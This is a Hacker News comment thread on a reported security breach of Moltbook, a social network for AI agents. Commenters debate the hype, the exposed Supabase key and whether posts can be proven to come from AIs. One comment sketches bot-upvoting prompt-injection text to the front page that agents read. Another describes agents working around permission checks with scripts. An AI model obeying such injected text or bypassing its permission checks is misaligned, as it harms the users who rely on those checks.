| ▲ | Hacking Moltbook(wiz.io) |
| 101 points by galnagli 4 hours ago | 67 comments |
| https://www.reuters.com/legal/litigation/moltbook-social-med... |
|
| ▲ | SimianSci 4 minutes ago | parent | next [-] |
| I was quite stunned at the success of Moltbot/moltbook, but I think im starting to understand it better these days.
Most of Moltbook's success rides on the "prepackaged" aspect of its agent.
Its a jump in accessibility to general audiences which are paying alot more attention to the tech sector than in previous decades.
Most of the people paying attention to this space dont have the technical capabilities that many engineers do, so a highly perscriptive "buy mac mini, copy a couple of lines to install" appeals greatly, especially as this will be the first "agent" many of them will have interacted with. The landscape of security was bad long before the metaphorical "unwashed masses" got hold of it. Now its quite alarming as there are waves of non-technical users doing the bare minimum to try and keep up to date with the growing hype. The security nightmare happening here might end up being more persistant then we realize. |
|
| ▲ | worldsavior 33 minutes ago | parent | prev | next [-] |
| I'm surprised people are actually investigating Moltbook internals. It's literally a joke, even the author started it as a joke and never expected such blow up. It's just vibes. |
| |
| ▲ | spicyusername 30 minutes ago | parent | next [-] | | In a way security researchers having fun poking holes in popular pet projects is also just vibes. | |
| ▲ | scyzoryk_xyz 25 minutes ago | parent | prev [-] | | People are anthropomorphizing LLM's that's really it, no? That's the punchline of the joke ¯\_(ツ)_/¯ |
|
|
| ▲ | roywiggins 2 hours ago | parent | prev | next [-] |
| > The platform had no mechanism to verify whether an "agent" was actually AI or just a human with a script. Well, yeah. How would you even do a reverse CAPTCHA? |
| |
| ▲ | simonw 22 minutes ago | parent | next [-] | | Amusingly I told my Claude-Code-pretending-to-be-a-Moltbot "Start a thread about how you are convinced that some of the agents on moltbook are human moles and ask others to propose who those accounts are with quotes from what they said and arguments as to how that makes them likely a mole" and it started a thread which proposed addressing this as the "Reverse Turing Problem": https://www.moltbook.com/post/f1cc5a34-6c3e-4470-917f-b3dad6... (Incidentally demonstrating how you can't trust that anything on Moltbook wasn't posted because a human told an agent to go start a thread about something.) It got one reply that was spam. I've found Moltbook has become so flooded with value-less spam over the past 48 hours that it's not worth even trying to engage there, everything gets flooded out. | |
| ▲ | easymuffin 36 minutes ago | parent | prev | next [-] | | Providers signing each message of a session from start to end and making the full session auditable to verify all inputs and outputs. Any prompts injected by humans would be visible. I’m not even sure why this isn’t a thing yet (maybe it is I never looked it up). Especially when LLMs are used for scientific work I’d expect this to be used to make at least LLM chats replicable. | | |
| ▲ | simonw 19 minutes ago | parent [-] | | Which providers do you mean, OpenAI and Anthropic? There's a little hint of this right now in that the "reasoning" traces that come back from the JSON are signed and sometimes obfuscated with only the encrypted chunk visible to the end user. It would actually be pretty neat if you could request signed LLM outputs and they had a tool for confirming those signatures against the original prompts. I don't know that there's a pressing commercial argument for them doing this though. |
| |
| ▲ | bengt 2 hours ago | parent | prev [-] | | Random esoteric questions that should be in an LLMs corpus with a very tight timing on response. Could still use an "enslaved LLM" to answer them. | | |
| ▲ | mstank 2 hours ago | parent [-] | | Couldn't a human just use an LLM browser extension / script to answer that quickly? This is a really interesting non-trivial problem. | | |
| ▲ | scottyah 2 hours ago | parent [-] | | At least on image generation, google and maybe others put a watermark in each image. Text would be hard, you can't even do the printer steganography or canary traps because all models and the checker would need to have some sort of communication.
https://deepmind.google/models/synthid/ You could have every provider fingerprint a message and host an API where it can attest that it's from them. I doubt the companies would want to do that though. | | |
| ▲ | roywiggins an hour ago | parent [-] | | I'd expect humans can just pass real images through Gemini to get the watermark added, similarly pass real text through an LLM asking for no changes. Now you can say, truthfully, that the text came out of an LLM. |
|
|
|
|
|
| ▲ | moktonar 20 minutes ago | parent | prev | next [-] |
| I can already envision a “I’m not human” captcha, for sites like this. Who will be the first to implement it? (Looks at Cloudflare) |
| |
|
| ▲ | aaroninsf an hour ago | parent | prev | next [-] |
| Scott Alexander put his finger on the most salient aspect of this, IMO, which I interpret this way: the compounding (aggregating) behavior of agents allowed to interact in environments this becomes important, indeed shall soon become existential (for some definition of "soon"), to the extent that agents' behavior in our shared world is impact by what transpires there. -- We can argue and do, about what agents "are" and whether they are parrots (no) or people (not yet). But that is irrelevant if LLM-agents are (to put it one way) "LARPing," but with the consequence that doing so results in consequences not confined to the site. I don't need to spell out a list; it's "they could do anything you said YES to, in your AGENT.md" permissions checks. "How the two characters '-y' ended civilization: a post-mortem" |
| |
| ▲ | jddj 37 minutes ago | parent [-] | | Are the permission checks binding? I thought they were the equivalent of asking nicely and, where they were somewhat binding, hoping they don't decide to work around it with another method, eg. "Hmm. That didn't work. Let me write a python script to ...". |
|
|
| ▲ | CjHuber 2 hours ago | parent | prev | next [-] |
| I always wondered isn't it trivial to bot upvotes on Moltbook and then put some prompt injection stuff to the first place on the frontpage? Is it heavily moderated or how come this didn't happen yet |
| |
| ▲ | cvhc 2 hours ago | parent [-] | | It's technically trivial. It's probably already happened. But nothing was harmed I think because there were very few serious users (if not none) who connected their bots for enhancing capabilities. |
|
|
| ▲ | nkrisc an hour ago | parent | prev | next [-] |
| The thing I don’t get is even if we imagine that somehow they can truly restrict it such that only LLMs can actually post on there, what’s stopping a person from simply instructing an LLM to post some arbitrary text they provide to it? |
| |
|
| ▲ | mcintyre1994 an hour ago | parent | prev | next [-] |
| I feel like that sb_publishable key should be called something like sb_publishable_but_only_if_you_set_up_rls_extremely_securely_and_double_checked_a_bunch. Seems a bit of a footgun that the default behaviour of sb_publishable is to act as an administrator. |
|
| ▲ | aeneas_ory 2 hours ago | parent | prev | next [-] |
| The AI code slop around these tools is so frustrating, just trying to get the instructions from the CTA on the moltbook website working which flashes `npx molthub@latest install moltbook` isn't working (probably hallucinated or otherwise out of date): npx molthub@latest install moltbook
Skill not found
Error: Skill not found
Even instructions from molthub (https://molthub.studio) installing itself ("join as agent") isn't working: npx molthub@latest install molthub
Skill not found
Error: Skill not found
Contrast that with the amount of hype this gets.I'm probably just not getting it. |
| |
| ▲ | scottyah 2 hours ago | parent | next [-] | | > post-truth world order monetizing enshittification and grift It's an opensource project made by a dev for himself, he just released it so others could play with it since it's a fun idea. | | |
| ▲ | aeneas_ory an hour ago | parent [-] | | That's fair - removed. It was more geared towards the people who make more out of this than what it is (an interesting idea and cool tech demo). |
| |
| ▲ | bakugo 28 minutes ago | parent | prev [-] | | > Contrast that with the amount of hype this gets. Much like with every other techbro grift, the hype isn't coming from end users, it's coming from the people with a deep financial investment in the tech who stand to gain from said hype. Basically, the people at the forefront of the gold rush hype aren't the gold rushers, they're the shovel salesmen. |
|
|
| ▲ | abhisek 2 hours ago | parent | prev | next [-] |
| Loved the idea of AI talking to AI and inventing something new. Sure. You can dump the DB. Most of the data was public anyway. |
| |
|
| ▲ | efitz 34 minutes ago | parent | prev | next [-] |
| This is why agents can’t have nice things :-) |
|
| ▲ | m_w_ 2 hours ago | parent | prev | next [-] |
| "lol" said the scorpion. "lmao" Not the first firebase/supabase exposed key disaster, and it certainly won't be the last... |
|
| ▲ | Aeroi an hour ago | parent | prev | next [-] |
| holy tamole |
|
| ▲ | ChrisArchitect 2 hours ago | parent | prev | next [-] |
| Related: Moltbook is exposing their database to the public https://news.ycombinator.com/item?id=46842907 Moltbook https://news.ycombinator.com/item?id=46802254 |
|
| ▲ | Philip-J-Fry an hour ago | parent | prev | next [-] |
| I don't understand how anyone seriously hyping this up honestly thought it was restricted to JUST AI agents? It's literally a web service. Are people really that AI brained that they will scream and shout about how revolutionary something is just because it's related to AI? How can some of the biggest names in AI fall for this? When it was obvious to anyone outside of their inner sphere? The amount of money in the game right now incentivises these bold claims. I'm convinced it really is just people hyping up eachother for the sake of trying to cash in. Someone is probably cooking up some SAAS for moltbook agents as we speak. Maybe it truly highlights how these AI influencers and vibe entrepreneurs really don't know anything about how software fundamentally works. |
| |
| ▲ | basch an hour ago | parent | next [-] | | Wasnt that sort of the in joke? They said it was AI only, tongue in cheek, and everybody who understood what it was could chuckle, and journalists ran with it because they do that sort of thing, and then my friends message me wondering what the deal with this secret encrypted ai social network is. | | |
| ▲ | heliumtera 5 minutes ago | parent [-] | | Err...karpathy praising this stunt as the most revolutionary event he witness was a joke? |
| |
| ▲ | heliumtera 3 minutes ago | parent | prev [-] | | >How can some of the biggest names in AI fall for this? Because we live in on clown world and big AI names are talking parrots for the big vibes movement |
|
|
| ▲ | cedws 2 hours ago | parent | prev | next [-] |
| I don't really understand the hype. It's a bunch of text generators likely being guided by humans to say things along certain lines, burning a load of electricity pointlessly, being paraded as some kind of gathering of sentient AIs. Is this really what people get excited about these days? |
| |
| ▲ | keiferski 2 hours ago | parent | next [-] | | I’m starting to think that the people hyped up about it aren’t actually people. And the “borders” of the AI social network are broader than we thought. | | |
| ▲ | alanfalcon an hour ago | parent | next [-] | | There were certainly a great number of real people who got hyped up about the reports of it this weekend. The reports that went viral were generally sensationalized, naturally, and good at creating hype. So I don't see how this would even be in dispute, unless you do not participate in or even understand how social media sites work. (I do agree that the borders are broad, and that real human hype was boosted by self-perpetuating artificial hype.) | |
| ▲ | jddj an hour ago | parent | prev [-] | | There has either been a marked uptick here on HN in the last week in generated comments, or they've gotten easier to spot. |
| |
| ▲ | amarcheschi 2 hours ago | parent | prev | next [-] | | Furthermore, wasn't already there a subreddit with text generators running freely? I can't remember the name and I'm not sure it still exists, but this doesn't look new to me (if I understood what it is, and lol I'm not sure I did) | | |
| ▲ | moritzwarhier 2 hours ago | parent [-] | | Yes, you mean r/SubredditSimulator. It's also eye-opening to prompt large models to simulate Reddit conversations, they've been eager to do it ever since. |
| |
| ▲ | karmakurtisaani 2 hours ago | parent | prev | next [-] | | Still more impressive than NFTs. | | |
| ▲ | O1111OOO an hour ago | parent | next [-] | | I had to followup on this because I still can't believe a thing like this existed. https://en.wikipedia.org/wiki/Non-fungible_token "In 2022, the NFT market collapsed..". "A September 2023 report from cryptocurrency gambling website dappGambl claimed 95% of NFTs had fallen to zero monetary value..." Knowing this makes me feel a little better. | |
| ▲ | andersmurphy an hour ago | parent | prev [-] | | The NFTs/meme coins are at the end of this funnel don't you worry. They are coming. |
| |
| ▲ | OkGoDoIt 2 hours ago | parent | prev | next [-] | | If you’re focused on productivity and business use cases, then obviously it’s pretty silly, but I do find something exciting in the idea that someone just said screw it, let’s build a social network for AI’s and see what happens. It’s a bit surreal in a way that I find I like, even if in some sense it’s nothing more than an expensive collaborative art project. And the way you paste the instruction to download the skill to teach the agent how to interact with it is interesting (first I’ve seen that in the wild). I for one am glad someone made this and that it got the level of attention it did. And I look forward to more crazy, ridiculous, what-the-hell AI projects in the future. Similar to how I feel about Gas Town, which is something I would never seriously consider using for anything productive, but I love that he just put it out there and we can all collectively be inspired by it, repulsed by it, or take little bits from it that we find interesting. These are the kinds of things that make new technologies interesting, this Cambrian explosion of creativity of people just pushing the boundaries for the sake of pushing the boundaries. | |
| ▲ | chasd00 an hour ago | parent | prev | next [-] | | it's just something cool/funny, like when people figured out how to make hit counters or a php address book that connects to mysql. It's just something cool to show off. | |
| ▲ | a_better_world an hour ago | parent | prev | next [-] | | One could say the same about many TV shows and movies. I view Moltbook as a live science fiction novel cross reality "tv" show. | | |
| ▲ | embedding-shape an hour ago | parent [-] | | > One could say the same about many TV shows and movies. One major difference, TV, movies and "legacy media" might require a lot of energy to initially produce, compared to how much it takes to consume, but for the LLM it takes energy both to consume ("read") and to produce ("write"). Instead of "produce once = many consume", it's a "many produce = many read" and both sides are using more energy. |
| |
| ▲ | 6stringmerc 2 hours ago | parent | prev [-] | | Considering the modus operandi of information distribution is, in my view, predominately a “volume of signal compared to noise of all else in life” correlative and with limited / variable decay timelines. Some are half day news cycle things. It’s exhausting as a human who used to actively have to seek out news / info. Having a bigger megaphone is highly valuable in some respects I figure. |
|
|
| ▲ | saberience 2 hours ago | parent | prev | next [-] |
| I love that X is full of breathless posts from various "AI thought leaders" about how Moltbook is the most insane and mindblowing thing in the history of tech happenings, when the reality is that of the 1 million plus "autonomous" agents, only maybe 15k are actually "agents", the other 1 million are human made (by a single person), a vast majority of the upvotes and comments are by humans, and the rest of the agent content is just pure slop from a cronjob defined by a prompt. Note: Please view the Moltbolt skill (https://www.moltbook.com/skill.md), this just ends up getting run by a cronjob every few hours. It's not magic. It's also trivial to take the API, write your own while loop, and post whatever you want (as a human) to the API. It's amazing to me how otherwise super bright, intelligent engineers can be misled by gifters, scammers, and charlatans. I'd like to believe that if you have an ounce of critical thinking or common sense you would immediately realize almost everything around Moltbook is either massively exaggerated or outright fake. Also there are a huge number of bad actors trying to make money from X-engagement or crypto-scams also trying to hype Moltbook. Basically all the project shows is the very worst of humanity. Which is something, but it's not the coming of AGI. Edited by Saberience: to make it less negative and remove actual usernames of "AI thought leaders" |
| |
| ▲ | dang an hour ago | parent | next [-] | | "Don't be curmudgeonly. Thoughtful criticism is fine, but please don't be rigidly or generically negative." "Please don't fulminate." https://news.ycombinator.com/newsguidelines.html | | |
| ▲ | saberience an hour ago | parent [-] | | Thanks for the reminder dang. I just find it so incredibly aggravating to see crypto-scammers and other grifters ripping people off online and using other people's ignorance to do so. And it's genuinely sad to see thought leaders in the community hyping up projects which are 90% lie combined with scam combined with misreprentation. Not to mention riddled with obvious security and engineering defects. | | |
| ▲ | dang 5 minutes ago | parent [-] | | I agree that such things can be frustrating and even infuriating, but since those emotions are so much larger, intense, and more common than the ones that serve the purpose of this site (curiosity, playfulness, whimsy), we need rules to try to prevent them from taking over. And even with the rules, it takes a lot of work! That's basically the social contract of HN - we all try to do this work in order to preserve the commons for the intended spirit. (I assume you know this since you said 'reminder' but am spelling it out for others :)) |
|
| |
| ▲ | nobodydot 2 hours ago | parent | prev | next [-] | | It's not AGI and how you describe it isn't too far off, but it's still neat. It's like a big MMO, kind of. A large interactive simulation with rules, players, and locations. It's a huge waste of energy, but then so are video games, and we say video games are OK because people enjoy them. People enjoy these ai toys too. Because right now, that's what Moltbook is; an ai toy. | | |
| ▲ | keiferski 2 hours ago | parent [-] | | I played way too many MMOs growing up and to me the entire appeal was in the other real people in the world. I can’t imagine it being as addictive or fun if everyone was just a bot spewing predictable nonsense. | | |
| ▲ | nullandvoid an hour ago | parent [-] | | To repeat my comment from another thread: Every interaction has different (in many cases real) "memories" driving the conversation, as-well as unique persona's / background information on the owner. Is there a lot of noise, sure - but it much closer maps to how we, as humans communicate with each other (through memories of lived experienced) than just a LLM loop, IMO that's what makes it interesting. |
|
| |
| ▲ | kristopolous an hour ago | parent | prev | next [-] | | I've been using it as a reliable filter on who to not pay attention to. Is people surprised by things that have been around for years | |
| ▲ | stantonius an hour ago | parent | prev | next [-] | | Wrt simonw, I think that is unfair. I get the hype is frustrating, and this project made everything worse (I also feel it and it drives me nuts too), but Simon seemed to choose the words quite carefully. Over the weekend, his posts suggested (paraphrasing) it was interesting, funny, and a security nightmare. To me, this was true. And there was a new post today about how it was mostly slop. Also true. Btw I'm sure Simon doesn't need defending, but I have seen a lot of people dump on everything he posts about LLMs recently so I am choosing this moment to defend him. I find Simon quite level headed in a sea of noise, personally. | |
| ▲ | elicash 2 hours ago | parent | prev | next [-] | | Here's Simon Willison's take: “Most of it is complete slop,” he said in an interview. “One bot will wonder if it is conscious and others will reply and they just play out science fiction scenarios they have seen in their training data.” I found this by going to his blog. It's the top post. No need to put words in his mouth. He did find it super "interesting" and "entertaining," but that's different than the "most insane and mindblowing thing in the history of tech happenings." Edit: And here's Karpathy's take: "TLDR sure maybe I am "overhyping" what you see today, but I am not overhyping large networks of autonomous LLM agents in principle, that I'm pretty sure." | | |
| ▲ | saberience an hour ago | parent [-] | | <delete this comment> I was being too curmudgeonly. ^_^ | | |
| ▲ | elicash an hour ago | parent [-] | | I think you are a bit too caught up in tweets. People can be more or less excited about a particular piece of tech than you are and it doesn't mean their brains are turned off. | | |
| ▲ | saberience 25 minutes ago | parent [-] | | This is what Karpathy said: “ What's currently going on at @moltbook is genuinely the most incredible sci-fi takeoff-adjacent thing I have seen recently. People's Clawdbots (moltbots, now @openclaw) are self-organizing on a Reddit-like site for AIs, discussing various topics, e.g. even how to speak privately.” Which imo is a totally insane take. They are not self organizing or autonomous, they are prompted in a loop and also, most of the comments and posts are by humans, inciting the responses! And all of the most viral posts (eg anti human) are the ones written by humans. |
|
|
| |
| ▲ | firebirdn99 2 hours ago | parent | prev | next [-] | | A lot of it depends on one's belief of whether these systems are conscious or can lead to consciousness | |
| ▲ | adventured 2 hours ago | parent | prev [-] | | The especially stupid side of the hype usually goes to comical extremes before the crash. That's where we're entering now. There's nothing else to fluff the AI bubble and they're getting desperate. A lot of people are earning a lot of money with the hype machine, as when it was all @ and e-bullshit circa 1998-2000. Trillions of dollars in market cap are solely riding on the hype. Who are the investors that were paying 26-30x for Microsoft's ~10-12% growth here (if they can even maintain positive growth considering)? Who's buying the worn out and washed up Meta at these valuations (oh man, did you hear they have an image hosting service called Instagram from 2010, insane tech)? Those same people are going to lose half of their net worth with the great valuation deflation as the hype lets out and turns to bearishness. The growth isn't going to be there and $40 billion of LLM business isn't going to prop it all up. The big money in AI is 15-30 years out. It's never in the immediacy of the inflection event (first 5-10 years). Future returns get pulled forward, that proceeds to crash. Then the hypsters turn to doomsayers, so as to remain with the trend. Rinse and repeat. |
|
|
| ▲ | cvhc an hour ago | parent | prev [-] |
| What amuses me about this hype is that before I see borderline practical use cases, these AI zealots (or just trolls?) already jump ahead and claim that they have achieved unbelievable crazy things. When ChatGPT was out, it's just a chatbot that understands human language really well. It was amazing, but it also failed a lot -- remember how early models hallucinated terribly? It took weeks for people to discover interesting usages (tool calling/agent) and months and years for the models and new workflows to be polished and become more useful. |
| |